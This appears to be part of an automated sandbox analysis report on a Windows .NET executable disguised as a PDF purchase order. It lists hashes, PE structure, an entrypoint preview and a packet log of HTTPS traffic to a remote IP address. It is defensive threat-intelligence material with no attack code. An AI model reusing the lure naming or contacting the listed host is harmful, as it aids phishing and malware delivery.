                                        SSDEEP:3:ggPYV:rPYV
                                        MD5:187F488E27DB4AF347237FE461A079AD
                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                        Malicious:true
                                        Reputation:high, very likely benign file
                                        Preview:[ZoneTransfer]....ZoneId=0

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):5.5039704490014545
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        • DOS Executable Generic (2002/1) 0.01%
                                        File name:PO#8329837372938383839238PDF.exe
                                        File size:181'760 bytes
                                        MD5:ba88dca6e9d0a6f55a8addc30b02d988
                                        SHA1:f48b8d8255a9192675dde74ef7db412fcb528792
                                        SHA256:b15e57df1ab1fc902337d52f633267b802ccee6f37ba21ca065ae14380817081
                                        SHA512:f10c077bb1aa2c0c32ce0dc03a0b3e27f838b98c1251d7540d2d81e7c3b13ee45cfcb79be085ea83dd12ee9eb0613a1fc116f9283236379fdf85320199a6e2c3
                                        SSDEEP:3072:jvXdvpzRm9npGJyJObSGOOs3KI/ZMQRoGaHn2J:jvXdvpzRmzm/bSGOOs3KI/GQI
                                        TLSH:09048317BAD789A3C244573AC6DA00181375E6837393D71BB98E2BE908077FA5E5E703
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....h>g............................N.... ........@.. ....................... ............`................................

                                        File Icon

                                        Icon Hash:00928e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint:0x42db4e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x673E68DF [Wed Nov 20 22:55:27 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2db000x4b.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2e0000x598.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x300000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x2bb540x2bc006eafdd7da1568ee467d4f32a94f6dff6False0.4162611607142857data5.5248337986723435IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x2e0000x5980x60079464bbf0ccf66124acfe26ef74aa965False0.4147135416666667data4.061762393618138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x300000xc0x2008375b3d8ee84829f79bef0e7178c2be7False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x2e0a00x30cdata0.42435897435897435
                                        RT_MANIFEST0x2e3ac0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                        Imports

                                        DLLImport
                                        mscoree.dll_CorExeMain

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2024 08:58:04.961899996 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:04.961935997 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:04.962044954 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:04.985246897 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:04.985266924 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:06.521660089 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:06.521758080 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:06.526801109 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:06.526813030 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:06.527060032 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:06.611623049 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:06.655364990 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.260237932 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.260297060 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.260307074 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.260324955 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.260335922 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.260345936 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.260400057 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.260410070 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.260556936 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.260556936 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.367861986 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.367909908 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.368015051 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.368026018 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.368077040 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.368077040 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.465400934 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.465430975 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.465553045 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.465553045 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.465565920 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.466375113 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.537755966 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.537781954 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.537870884 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.537879944 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.537906885 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.537928104 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.565463066 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.565490007 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.565577030 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.565599918 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.565768003 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.565768003 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.593158007 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.593182087 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.593247890 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.593256950 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.593286037 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.593431950 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.664385080 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.664410114 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.664653063 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.664660931 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.664731979 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.732633114 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.732664108 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.732733011 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.732747078 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.732819080 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.732848883 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.747337103 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.747360945 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.747471094 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.747487068 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.747558117 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.761806011 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.761831045 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.761899948 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.761909962 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.761933088 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.761948109 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.773380041 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.773396969 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.773535967 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.773550987 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.773593903 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.786036015 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.786062002 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.786154032 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.786170959 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.786221027 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.809724092 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.809743881 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.809853077 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.809866905 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.809962034 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.924309015 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.924333096 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.924427986 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.924447060 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.924527884 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.932815075 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.932836056 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.932991982 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.932991982 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.933001041 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.933051109 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.940172911 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.940191031 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.940272093 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.940282106 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.940378904 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.948623896 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.948641062 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.948731899 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.948739052 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.948790073 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.957129002 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.957145929 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.957477093 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.957485914 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.957534075 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.965079069 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.965092897 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.965197086 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:07.965204954 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:07.965287924 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.004738092 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.004760981 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.004842043 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.004851103 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.004873037 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.005049944 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.064857960 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.064877033 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.064960957 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.064975977 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.065155029 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.128469944 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.128489017 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.128552914 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.128561020 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.128613949 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.134774923 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.134792089 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.134875059 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.134882927 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.134970903 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.141835928 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.141853094 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.141921997 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.141928911 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.142007113 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.148818016 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.148833990 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.148952007 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.148987055 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.149123907 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.155881882 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.155900955 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.156399965 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.156408072 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.156450033 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.162467003 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.162481070 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.162545919 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.162554979 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.162910938 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.206108093 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.206126928 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.206192970 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.206204891 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.206269026 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.266094923 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.266110897 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.266189098 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.266206026 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.266252041 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.328969002 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.328984022 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.329045057 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.329058886 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.329144955 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.335911989 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.335933924 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.336030960 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.336041927 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.336086988 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.342787981 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.342811108 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.342869043 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.342878103 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.342921019 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.342941999 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.348881960 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.348911047 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.348963976 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.348973036 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.349000931 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.349025965 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.355724096 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.355750084 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.355798006 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.355806112 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.355865955 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.362135887 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.362157106 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.362205029 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.362211943 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.362248898 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.362268925 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.408370018 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.408428907 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.408458948 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.408468008 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.408525944 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.408525944 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.467278004 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.467351913 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.467375994 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.467385054 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.467422009 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.467442036 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.530745983 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.530772924 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.530837059 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.530858994 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.530903101 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.536807060 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.536829948 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.536871910 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.536879063 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.536906958 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.536942005 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.543800116 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.543821096 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.543885946 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.543894053 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.543947935 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.550497055 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.550518036 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.550576925 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.550584078 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.550612926 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.550626993 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.556541920 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.556565046 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.556638956 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.556648016 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.556709051 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.563843012 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.563864946 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.563927889 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.563935041 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.563951015 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.564018965 CET49714443192.168.2.6167.250.5.91
                                        Nov 21, 2024 08:58:08.608740091 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.608772039 CET44349714167.250.5.91192.168.2.6
                                        Nov 21, 2024 08:58:08.608814001 CET49714443192.168.2.6167.250.5.91
